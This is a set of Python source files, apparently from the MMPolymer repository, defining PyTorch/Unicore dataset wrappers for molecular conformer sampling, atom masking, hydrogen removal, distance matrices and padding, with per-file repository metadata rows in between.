new_item = torch.full((h + 2, w + 2), self.token).type_as(item)
new_item[1:-1, 1:-1] = item
return new_item
return item
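    # Illustrative example (hypothetical values): for a 2x2 matrix [[a, b], [c, d]] and token t,
    # __getitem__ returns
    #   [[t, t, t, t],
    #    [t, a, b, t],
    #    [t, c, d, t],
    #    [t, t, t, t]]
    # mirroring the special tokens prepended/appended to the 1D atom sequence.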
| 719 | Python | .py | 18 | 33.166667 | 75 | 0.645624 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,134 | conformer_sample_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/conformer_sample_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
from . import data_utils
class ConformerSampleDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
input_ids = self.dataset[index]["input_ids"]
attention_mask = self.dataset[index]["attention_mask"]
return {"atoms": atoms, "coordinates": coordinates.astype(np.float32), "input_ids": input_ids, "attention_mask": attention_mask}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSamplePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, dict_name):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.dict_name = dict_name
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
if self.dict_name == "dict_coarse.txt":
atoms = np.array([a[0] for a in self.dataset[index][self.atoms]])
elif self.dict_name == "dict_fine.txt":
atoms = np.array(
[
a[0] if len(a) == 1 or a[0] == "H" else a[:2]
for a in self.dataset[index][self.atoms]
]
)
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
residue = np.array(self.dataset[index]["residue"])
        score = float(self.dataset[index]["meta_info"]["fpocket"]["Score"])
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"residue": residue,
"score": score,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSamplePocketFinetuneDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, residues, coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(
[a[0] for a in self.dataset[index][self.atoms]]
) # only 'C H O N S'
assert len(atoms) > 0
        # This check is kept for possible future extension:
        # a pocket currently has only one conformation, so the sampling below is effectively a no-op.
if isinstance(self.dataset[index][self.coordinates], list):
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
else:
coordinates = self.dataset[index][self.coordinates]
if self.residues in self.dataset[index]:
residues = np.array(self.dataset[index][self.residues])
else:
residues = None
assert len(atoms) == len(coordinates)
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.residues: residues,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleConfGDataset(BaseWrapperDataset):
def __init__(self, dataset, seed, atoms, coordinates, tgt_coordinates):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.tgt_coordinates = tgt_coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
tgt_coordinates = self.dataset[index][self.tgt_coordinates]
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.tgt_coordinates: tgt_coordinates.astype(np.float32),
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleConfGV2Dataset(BaseWrapperDataset):
def __init__(
self,
dataset,
seed,
atoms,
coordinates,
tgt_coordinates,
beta=1.0,
smooth=0.1,
topN=10,
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.tgt_coordinates = tgt_coordinates
self.beta = beta
self.smooth = smooth
self.topN = topN
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
meta_df = self.dataset[index]["meta"]
tgt_conf_ids = meta_df["gid"].unique()
# randomly choose one conf
with data_utils.numpy_seed(self.seed, epoch, index):
conf_id = np.random.choice(tgt_conf_ids)
conf_df = meta_df[meta_df["gid"] == conf_id]
conf_df = conf_df.sort_values("score").reset_index(drop=False)[
: self.topN
        ]  # only keep the top-N lowest-score confs for sampling
# importance sampling with rmsd inverse score
def normalize(x, beta=1.0, smooth=0.1):
x = 1.0 / (x**beta + smooth)
return x / x.sum()
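        # Illustrative numbers (hypothetical RMSD scores): with beta=1.0 and smooth=0.1, scores
        # [0.5, 1.0] give unnormalized weights [1/0.6, 1/1.1] ≈ [1.67, 0.91], i.e. ≈ [0.65, 0.35]
        # after normalization, so lower-RMSD conformers are sampled more often.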
rmsd_score = conf_df["score"].values
weight = normalize(
rmsd_score, beta=self.beta, smooth=self.smooth
) # for smoothing purpose
with data_utils.numpy_seed(self.seed, epoch, index):
idx = np.random.choice(len(conf_df), 1, replace=False, p=weight)
# idx = [np.argmax(weight)]
coordinates = conf_df.iloc[idx]["rdkit_coords"].values[0]
tgt_coordinates = conf_df.iloc[idx]["tgt_coords"].values[0]
return {
self.atoms: atoms,
self.coordinates: coordinates.astype(np.float32),
self.tgt_coordinates: tgt_coordinates.astype(np.float32),
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class ConformerSampleDockingPoseDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
seed,
atoms,
coordinates,
pocket_atoms,
pocket_coordinates,
holo_coordinates,
holo_pocket_coordinates,
is_train=True,
):
self.dataset = dataset
self.seed = seed
self.atoms = atoms
self.coordinates = coordinates
self.pocket_atoms = pocket_atoms
self.pocket_coordinates = pocket_coordinates
self.holo_coordinates = holo_coordinates
self.holo_pocket_coordinates = holo_pocket_coordinates
self.is_train = is_train
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
size = len(self.dataset[index][self.coordinates])
with data_utils.numpy_seed(self.seed, epoch, index):
sample_idx = np.random.randint(size)
coordinates = self.dataset[index][self.coordinates][sample_idx]
pocket_atoms = np.array(
[item[0] for item in self.dataset[index][self.pocket_atoms]]
)
pocket_coordinates = self.dataset[index][self.pocket_coordinates][0]
if self.is_train:
holo_coordinates = self.dataset[index][self.holo_coordinates][0]
holo_pocket_coordinates = self.dataset[index][self.holo_pocket_coordinates][
0
]
else:
holo_coordinates = coordinates
holo_pocket_coordinates = pocket_coordinates
smi = self.dataset[index]["smi"]
pocket = self.dataset[index]["pocket"]
return {
"atoms": atoms,
"coordinates": coordinates.astype(np.float32),
"pocket_atoms": pocket_atoms,
"pocket_coordinates": pocket_coordinates.astype(np.float32),
"holo_coordinates": holo_coordinates.astype(np.float32),
"holo_pocket_coordinates": holo_pocket_coordinates.astype(np.float32),
"smi": smi,
"pocket": pocket,
}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 10,289 | Python | .py | 247 | 32.42915 | 136 | 0.612932 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,135 | from_str_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/from_str_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import torch
from functools import lru_cache
from unicore.data import UnicoreDataset
class FromStrLabelDataset(UnicoreDataset):
def __init__(self, labels):
super().__init__()
self.labels = labels
@lru_cache(maxsize=16)
def __getitem__(self, index):
return self.labels[index]
def __len__(self):
return len(self.labels)
def collater(self, samples):
return torch.tensor(list(map(float, samples)))
| 588 | Python | .py | 16 | 31.625 | 69 | 0.699647 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,136 | add_2d_conformer_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/add_2d_conformer_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
from rdkit import Chem
from rdkit.Chem import AllChem
class Add2DConformerDataset(BaseWrapperDataset):
def __init__(self, dataset, smi, atoms, coordinates):
self.dataset = dataset
self.smi = smi
self.atoms = atoms
self.coordinates = coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
atoms = np.array(self.dataset[index][self.atoms])
assert len(atoms) > 0
smi = self.dataset[index][self.smi]
coordinates_2d = smi2_2Dcoords(smi)
coordinates = self.dataset[index][self.coordinates]
coordinates.append(coordinates_2d)
input_ids = self.dataset[index]["input_ids"]
attention_mask = self.dataset[index]["attention_mask"]
return {"smi": smi, "atoms": atoms, "coordinates": coordinates, "input_ids": input_ids, "attention_mask": attention_mask}
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
def smi2_2Dcoords(smi):
mol = Chem.MolFromSmiles(smi)
mol = AllChem.AddHs(mol)
AllChem.Compute2DCoords(mol)
coordinates = mol.GetConformer().GetPositions().astype(np.float32)
    assert len(mol.GetAtoms()) == len(
        coordinates
    ), "2D coordinates shape is not aligned with {}".format(smi)
return coordinates
| 1,673 | Python | .py | 39 | 36.769231 | 129 | 0.685732 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,137 | mask_points_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/mask_points_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
import numpy as np
import torch
from unicore.data import Dictionary
from unicore.data import BaseWrapperDataset
from . import data_utils
class MaskPointsDataset(BaseWrapperDataset):
def __init__(
self,
dataset: torch.utils.data.Dataset,
coord_dataset: torch.utils.data.Dataset,
vocab: Dictionary,
pad_idx: int,
mask_idx: int,
noise_type: str,
noise: float = 1.0,
seed: int = 1,
mask_prob: float = 0.15,
leave_unmasked_prob: float = 0.1,
random_token_prob: float = 0.1,
):
assert 0.0 < mask_prob < 1.0
assert 0.0 <= random_token_prob <= 1.0
assert 0.0 <= leave_unmasked_prob <= 1.0
assert random_token_prob + leave_unmasked_prob <= 1.0
self.dataset = dataset
self.coord_dataset = coord_dataset
self.vocab = vocab
self.pad_idx = pad_idx
self.mask_idx = mask_idx
self.noise_type = noise_type
self.noise = noise
self.seed = seed
self.mask_prob = mask_prob
self.leave_unmasked_prob = leave_unmasked_prob
self.random_token_prob = random_token_prob
if random_token_prob > 0.0:
weights = np.ones(len(self.vocab))
weights[vocab.special_index()] = 0
self.weights = weights / weights.sum()
self.epoch = None
if self.noise_type == "trunc_normal":
self.noise_f = lambda num_mask: np.clip(
np.random.randn(num_mask, 3) * self.noise,
a_min=-self.noise * 2.0,
a_max=self.noise * 2.0,
)
elif self.noise_type == "normal":
self.noise_f = lambda num_mask: np.random.randn(num_mask, 3) * self.noise
elif self.noise_type == "uniform":
self.noise_f = lambda num_mask: np.random.uniform(
low=-self.noise, high=self.noise, size=(num_mask, 3)
)
else:
self.noise_f = lambda num_mask: 0.0
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.coord_dataset.set_epoch(epoch)
self.dataset.set_epoch(epoch)
self.epoch = epoch
def __getitem__(self, index: int):
return self.__getitem_cached__(self.epoch, index)
@lru_cache(maxsize=16)
def __getitem_cached__(self, epoch: int, index: int):
ret = {}
with data_utils.numpy_seed(self.seed, epoch, index):
item = self.dataset[index]
coord = self.coord_dataset[index]
sz = len(item)
# don't allow empty sequence
assert sz > 0
# decide elements to mask
num_mask = int(
# add a random number for probabilistic rounding
self.mask_prob * sz
+ np.random.rand()
)
mask_idc = np.random.choice(sz, num_mask, replace=False)
mask = np.full(sz, False)
mask[mask_idc] = True
ret["targets"] = np.full(len(mask), self.pad_idx)
ret["targets"][mask] = item[mask]
ret["targets"] = torch.from_numpy(ret["targets"]).long()
# decide unmasking and random replacement
rand_or_unmask_prob = self.random_token_prob + self.leave_unmasked_prob
if rand_or_unmask_prob > 0.0:
rand_or_unmask = mask & (np.random.rand(sz) < rand_or_unmask_prob)
if self.random_token_prob == 0.0:
unmask = rand_or_unmask
rand_mask = None
elif self.leave_unmasked_prob == 0.0:
unmask = None
rand_mask = rand_or_unmask
else:
unmask_prob = self.leave_unmasked_prob / rand_or_unmask_prob
decision = np.random.rand(sz) < unmask_prob
unmask = rand_or_unmask & decision
rand_mask = rand_or_unmask & (~decision)
else:
unmask = rand_mask = None
if unmask is not None:
mask = mask ^ unmask
new_item = np.copy(item)
new_item[mask] = self.mask_idx
num_mask = mask.astype(np.int32).sum()
new_coord = np.copy(coord)
new_coord[mask, :] += self.noise_f(num_mask)
if rand_mask is not None:
num_rand = rand_mask.sum()
if num_rand > 0:
new_item[rand_mask] = np.random.choice(
len(self.vocab),
num_rand,
p=self.weights,
)
ret["atoms"] = torch.from_numpy(new_item).long()
ret["coordinates"] = torch.from_numpy(new_coord).float()
return ret
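    # Illustrative numbers (default ratios): with mask_prob=0.15, leave_unmasked_prob=0.1 and
    # random_token_prob=0.1, roughly 15% of atoms are selected; of those, ~80% become mask_idx,
    # ~10% keep their original token (and coordinates), and ~10% get a random non-special token.
    # Coordinate noise (noise_f) is added to every selected atom that was not left unmasked.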
class MaskPointsPocketDataset(BaseWrapperDataset):
def __init__(
self,
dataset: torch.utils.data.Dataset,
coord_dataset: torch.utils.data.Dataset,
residue_dataset: torch.utils.data.Dataset,
vocab: Dictionary,
pad_idx: int,
mask_idx: int,
noise_type: str,
noise: float = 1.0,
seed: int = 1,
mask_prob: float = 0.15,
leave_unmasked_prob: float = 0.1,
random_token_prob: float = 0.1,
):
assert 0.0 < mask_prob < 1.0
assert 0.0 <= random_token_prob <= 1.0
assert 0.0 <= leave_unmasked_prob <= 1.0
assert random_token_prob + leave_unmasked_prob <= 1.0
self.dataset = dataset
self.coord_dataset = coord_dataset
self.residue_dataset = residue_dataset
self.vocab = vocab
self.pad_idx = pad_idx
self.mask_idx = mask_idx
self.noise_type = noise_type
self.noise = noise
self.seed = seed
self.mask_prob = mask_prob
self.leave_unmasked_prob = leave_unmasked_prob
self.random_token_prob = random_token_prob
if random_token_prob > 0.0:
weights = np.ones(len(self.vocab))
weights[vocab.special_index()] = 0
self.weights = weights / weights.sum()
self.epoch = None
if self.noise_type == "trunc_normal":
self.noise_f = lambda num_mask: np.clip(
np.random.randn(num_mask, 3) * self.noise,
a_min=-self.noise * 2.0,
a_max=self.noise * 2.0,
)
elif self.noise_type == "normal":
self.noise_f = lambda num_mask: np.random.randn(num_mask, 3) * self.noise
elif self.noise_type == "uniform":
self.noise_f = lambda num_mask: np.random.uniform(
low=-self.noise, high=self.noise, size=(num_mask, 3)
)
else:
self.noise_f = lambda num_mask: 0.0
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.coord_dataset.set_epoch(epoch)
self.dataset.set_epoch(epoch)
self.epoch = epoch
def __getitem__(self, index: int):
return self.__getitem_cached__(self.epoch, index)
@lru_cache(maxsize=16)
def __getitem_cached__(self, epoch: int, index: int):
ret = {}
with data_utils.numpy_seed(self.seed, epoch, index):
item = self.dataset[index]
coord = self.coord_dataset[index]
sz = len(item)
# don't allow empty sequence
assert sz > 0
# mask on the level of residues
residue = self.residue_dataset[index]
res_list = list(set(residue))
res_sz = len(res_list)
# decide elements to mask
num_mask = int(
# add a random number for probabilistic rounding
self.mask_prob * res_sz
+ np.random.rand()
)
mask_res = np.random.choice(res_list, num_mask, replace=False).tolist()
mask = np.isin(residue, mask_res)
ret["targets"] = np.full(len(mask), self.pad_idx)
ret["targets"][mask] = item[mask]
ret["targets"] = torch.from_numpy(ret["targets"]).long()
# decide unmasking and random replacement
rand_or_unmask_prob = self.random_token_prob + self.leave_unmasked_prob
if rand_or_unmask_prob > 0.0:
rand_or_unmask = mask & (np.random.rand(sz) < rand_or_unmask_prob)
if self.random_token_prob == 0.0:
unmask = rand_or_unmask
rand_mask = None
elif self.leave_unmasked_prob == 0.0:
unmask = None
rand_mask = rand_or_unmask
else:
unmask_prob = self.leave_unmasked_prob / rand_or_unmask_prob
decision = np.random.rand(sz) < unmask_prob
unmask = rand_or_unmask & decision
rand_mask = rand_or_unmask & (~decision)
else:
unmask = rand_mask = None
if unmask is not None:
mask = mask ^ unmask
new_item = np.copy(item)
new_item[mask] = self.mask_idx
num_mask = mask.astype(np.int32).sum()
new_coord = np.copy(coord)
new_coord[mask, :] += self.noise_f(num_mask)
if rand_mask is not None:
num_rand = rand_mask.sum()
if num_rand > 0:
new_item[rand_mask] = np.random.choice(
len(self.vocab),
num_rand,
p=self.weights,
)
ret["atoms"] = torch.from_numpy(new_item).long()
ret["coordinates"] = torch.from_numpy(new_coord).float()
return ret
| 9,914 | Python | .py | 237 | 29.518987 | 85 | 0.537728 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,138 | remove_hydrogen_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/remove_hydrogen_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class RemoveHydrogenDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
remove_hydrogen=False,
remove_polar_hydrogen=False,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.remove_hydrogen = remove_hydrogen
self.remove_polar_hydrogen = remove_polar_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
if not self.remove_hydrogen and self.remove_polar_hydrogen:
end_idx = 0
for i, atom in enumerate(atoms[::-1]):
if atom != "H":
break
else:
end_idx = i + 1
if end_idx != 0:
atoms = atoms[:-end_idx]
coordinates = coordinates[:-end_idx]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class RemoveHydrogenResiduePocketDataset(BaseWrapperDataset):
def __init__(self, dataset, atoms, residues, coordinates, remove_hydrogen=True):
self.dataset = dataset
self.atoms = atoms
self.residues = residues
self.coordinates = coordinates
self.remove_hydrogen = remove_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
residues = dd[self.residues]
coordinates = dd[self.coordinates]
if len(atoms) != len(residues):
min_len = min(len(atoms), len(residues))
atoms = atoms[:min_len]
residues = residues[:min_len]
coordinates = coordinates[:min_len, :]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
residues = residues[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
dd[self.atoms] = atoms
dd[self.residues] = residues
dd[self.coordinates] = coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
class RemoveHydrogenPocketDataset(BaseWrapperDataset):
def __init__(
self,
dataset,
atoms,
coordinates,
holo_coordinates,
remove_hydrogen=True,
remove_polar_hydrogen=False,
):
self.dataset = dataset
self.atoms = atoms
self.coordinates = coordinates
self.holo_coordinates = holo_coordinates
self.remove_hydrogen = remove_hydrogen
self.remove_polar_hydrogen = remove_polar_hydrogen
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
atoms = dd[self.atoms]
coordinates = dd[self.coordinates]
holo_coordinates = dd[self.holo_coordinates]
if self.remove_hydrogen:
mask_hydrogen = atoms != "H"
atoms = atoms[mask_hydrogen]
coordinates = coordinates[mask_hydrogen]
holo_coordinates = holo_coordinates[mask_hydrogen]
if not self.remove_hydrogen and self.remove_polar_hydrogen:
end_idx = 0
for i, atom in enumerate(atoms[::-1]):
if atom != "H":
break
else:
end_idx = i + 1
if end_idx != 0:
atoms = atoms[:-end_idx]
coordinates = coordinates[:-end_idx]
holo_coordinates = holo_coordinates[:-end_idx]
dd[self.atoms] = atoms
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.holo_coordinates] = holo_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 4,929 | Python | .py | 128 | 28.789063 | 84 | 0.597365 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,139 | distance_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/distance_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import torch
from scipy.spatial import distance_matrix
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class DistanceDataset(BaseWrapperDataset):
def __init__(self, dataset):
super().__init__(dataset)
self.dataset = dataset
@lru_cache(maxsize=16)
def __getitem__(self, idx):
pos = self.dataset[idx].view(-1, 3).numpy()
dist = distance_matrix(pos, pos).astype(np.float32)
return torch.from_numpy(dist)
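    # Illustrative example (hypothetical coordinates): for positions [[0, 0, 0], [3, 4, 0]] the
    # returned pairwise-distance matrix is [[0., 5.], [5., 0.]].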
class EdgeTypeDataset(BaseWrapperDataset):
def __init__(self, dataset: torch.utils.data.Dataset, num_types: int):
self.dataset = dataset
self.num_types = num_types
@lru_cache(maxsize=16)
def __getitem__(self, index: int):
node_input = self.dataset[index].clone()
offset = node_input.view(-1, 1) * self.num_types + node_input.view(1, -1)
return offset
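    # Illustrative example (hypothetical values): with num_types=4 and atom tokens [2, 3], the
    # pairwise edge types are offset[i][j] = token_i * num_types + token_j = [[10, 11], [14, 15]].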
class CrossDistanceDataset(BaseWrapperDataset):
def __init__(self, mol_dataset, pocket_dataset):
super().__init__(mol_dataset)
self.mol_dataset = mol_dataset
self.pocket_dataset = pocket_dataset
@lru_cache(maxsize=16)
def __getitem__(self, idx):
mol_pos = self.mol_dataset[idx].view(-1, 3).numpy()
pocket_pos = self.pocket_dataset[idx].view(-1, 3).numpy()
dist = distance_matrix(mol_pos, pocket_pos).astype(np.float32)
return torch.from_numpy(dist)
| 1,558 | Python | .py | 36 | 37.222222 | 81 | 0.679233 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,140 | __init__.py | FanmengWang_MMPolymer/MMPolymer/data/__init__.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from .key_dataset import KeyDataset
from .normalize_dataset import (
NormalizeDataset,
NormalizeDockingPoseDataset,
)
from .remove_hydrogen_dataset import (
RemoveHydrogenDataset,
RemoveHydrogenResiduePocketDataset,
RemoveHydrogenPocketDataset,
)
from .tta_dataset import (
TTADataset,
TTADockingPoseDataset,
)
from .cropping_dataset import (
CroppingDataset,
CroppingPocketDataset,
CroppingResiduePocketDataset,
CroppingPocketDockingPoseDataset,
)
from .atom_type_dataset import AtomTypeDataset
from .add_2d_conformer_dataset import Add2DConformerDataset
from .distance_dataset import (
DistanceDataset,
EdgeTypeDataset,
CrossDistanceDataset,
)
from .conformer_sample_dataset import (
ConformerSampleDataset,
ConformerSamplePocketDataset,
ConformerSamplePocketFinetuneDataset,
ConformerSampleConfGDataset,
ConformerSampleConfGV2Dataset,
ConformerSampleDockingPoseDataset,
)
from .mask_points_dataset import MaskPointsDataset, MaskPointsPocketDataset
from .coord_pad_dataset import RightPadDatasetCoord, RightPadDatasetCross2D
from .from_str_dataset import FromStrLabelDataset
from .lmdb_dataset import LMDBDataset
from .prepend_and_append_2d_dataset import PrependAndAppend2DDataset
__all__ = [] | 1,406 | Python | .py | 43 | 29.813953 | 75 | 0.828928 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,141 | coord_pad_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/coord_pad_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from unicore.data import BaseWrapperDataset
def collate_tokens_coords(
values,
pad_idx,
left_pad=False,
pad_to_length=None,
pad_to_multiple=1,
):
"""Convert a list of 1d tensors into a padded 2d tensor."""
size = max(v.size(0) for v in values)
size = size if pad_to_length is None else max(size, pad_to_length)
if pad_to_multiple != 1 and size % pad_to_multiple != 0:
size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
res = values[0].new(len(values), size, 3).fill_(pad_idx)
def copy_tensor(src, dst):
assert dst.numel() == src.numel()
dst.copy_(src)
for i, v in enumerate(values):
copy_tensor(v, res[i][size - len(v) :, :] if left_pad else res[i][: len(v), :])
return res
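# Illustrative example (hypothetical shapes): two coordinate tensors of shapes (3, 3) and (5, 3)
# with pad_to_multiple=8 are collated into one (2, 8, 3) tensor, right-padded with pad_idx.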
class RightPadDatasetCoord(BaseWrapperDataset):
def __init__(self, dataset, pad_idx, left_pad=False):
super().__init__(dataset)
self.pad_idx = pad_idx
self.left_pad = left_pad
def collater(self, samples):
return collate_tokens_coords(
samples, self.pad_idx, left_pad=self.left_pad, pad_to_multiple=8
)
def collate_cross_2d(
values,
pad_idx,
left_pad=False,
pad_to_length=None,
pad_to_multiple=1,
):
"""Convert a list of 2d tensors into a padded 2d tensor."""
size_h = max(v.size(0) for v in values)
size_w = max(v.size(1) for v in values)
if pad_to_multiple != 1 and size_h % pad_to_multiple != 0:
size_h = int(((size_h - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
if pad_to_multiple != 1 and size_w % pad_to_multiple != 0:
size_w = int(((size_w - 0.1) // pad_to_multiple + 1) * pad_to_multiple)
res = values[0].new(len(values), size_h, size_w).fill_(pad_idx)
def copy_tensor(src, dst):
assert dst.numel() == src.numel()
dst.copy_(src)
for i, v in enumerate(values):
copy_tensor(
v,
res[i][size_h - v.size(0) :, size_w - v.size(1) :]
if left_pad
else res[i][: v.size(0), : v.size(1)],
)
return res
class RightPadDatasetCross2D(BaseWrapperDataset):
def __init__(self, dataset, pad_idx, left_pad=False):
super().__init__(dataset)
self.pad_idx = pad_idx
self.left_pad = left_pad
def collater(self, samples):
return collate_cross_2d(
samples, self.pad_idx, left_pad=self.left_pad, pad_to_multiple=8
)
| 2,592 | Python | .py | 66 | 32.651515 | 87 | 0.609319 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,142 | atom_type_dataset.py | FanmengWang_MMPolymer/MMPolymer/data/atom_type_dataset.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from functools import lru_cache
from unicore.data import BaseWrapperDataset
class AtomTypeDataset(BaseWrapperDataset):
def __init__(
self,
raw_dataset,
dataset,
smi="smi",
atoms="atoms",
):
self.raw_dataset = raw_dataset
self.dataset = dataset
self.smi = smi
self.atoms = atoms
@lru_cache(maxsize=16)
def __getitem__(self, index: int):
        # guard against older RDKit versions where atoms and coordinates can have mismatched lengths
if len(self.dataset[index]["atoms"]) != len(self.dataset[index]["coordinates"]):
min_len = min(
len(self.dataset[index]["atoms"]),
len(self.dataset[index]["coordinates"]),
)
self.dataset[index]["atoms"] = self.dataset[index]["atoms"][:min_len]
self.dataset[index]["coordinates"] = self.dataset[index]["coordinates"][
:min_len
]
return self.dataset[index]
